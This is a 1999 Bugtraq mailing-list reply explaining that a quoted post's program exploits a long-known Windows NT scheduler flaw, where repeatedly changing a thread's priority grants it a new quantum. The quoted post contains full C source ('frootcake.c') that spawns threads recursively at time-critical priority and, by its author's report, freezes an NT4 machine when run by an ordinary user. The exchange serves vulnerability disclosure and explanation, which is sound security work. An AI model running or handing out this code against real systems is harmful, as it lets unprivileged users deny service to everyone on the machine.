[10794] in bugtraq
Re: ordinary users bringing NT to its knees [repost]
daemon@ATHENA.MIT.EDU (David Schwartz)
Thu Jun 10 16:00:16 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <000401beb378$3e703120$021d85d1@whenever.youwant.to>
Date: Thu, 10 Jun 1999 12:34:23 -0700
Reply-To: David Schwartz <davids@WEBMASTER.COM>
From: David Schwartz <davids@WEBMASTER.COM>
X-To: kiva <kiva@WOOKEY.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <000d01beb27e$6cc9f1f0$2d01a8c0@jizzlobber>
This is just an exploit for the 'neverending quantum' bug that's been known
for ages. See http://www.sysinternals.com/tips.htm#NEQuantum It has nothing
to do with the number of threads running (except that you need at least one
per CPU).
The bug occurs when a thread changes its priority. NT changes the thread's
priority, but also gives it a new execution quantum. By repeating this
process, a single thread can monopolize a CPU.
DS
> Hi,
>
> sorry if problems like this are known, but I thought I'd post this just
> incase...
>
> I was curious at how well NT could handle *lots* of threads, so I
> wrote the
> following. It basically locks up the system with an inability to kill the
> process because (I) never get the task manager up. Pretty bad since an
> ordinary user can run it :/
>
> my system: 2xPPro with NT4 (SP5), 128megs RAM.
>
> cheers
>
> ----------------------------
>
> /*
> * frootcake.c
> * kiva@wookey.org
> *
> * this tests NT at coping with *really dodgy* code...
> * it totally brings my SMP box to being unusable (SP5)
> */
>
> #include <windows.h>
> #include <stdio.h>
>
> void poobah();
>
> DWORD WINAPI thread_func (LPVOID lpv)
> {
> DWORD id;
> HANDLE h;
> BOOL success = 1;
>
> h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
>
> while (success){
> switch (GetThreadPriority (h)){
> case THREAD_PRIORITY_ABOVE_NORMAL:
> success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
> break;
> case THREAD_PRIORITY_BELOW_NORMAL:
> success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
> break;
> case THREAD_PRIORITY_HIGHEST:
> success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
> break;
> case THREAD_PRIORITY_IDLE:
> success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
> break;
> case THREAD_PRIORITY_LOWEST:
> success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
> break;
> case THREAD_PRIORITY_NORMAL:
> success = SetThreadPriority (h,
> THREAD_PRIORITY_TIME_CRITICAL);
> break;
> }
> }
>
> poobah();
> return 0;
> }
>
> void poobah()
> {
> DWORD id;
> HANDLE h;
>
> h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
> SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
>
> poobah();
> }
>
> int main ()
> {
> printf ("frootcake - kiva@wookey.org\n");
> poobah();
> return 0;
> }
>
> /* eof */
>
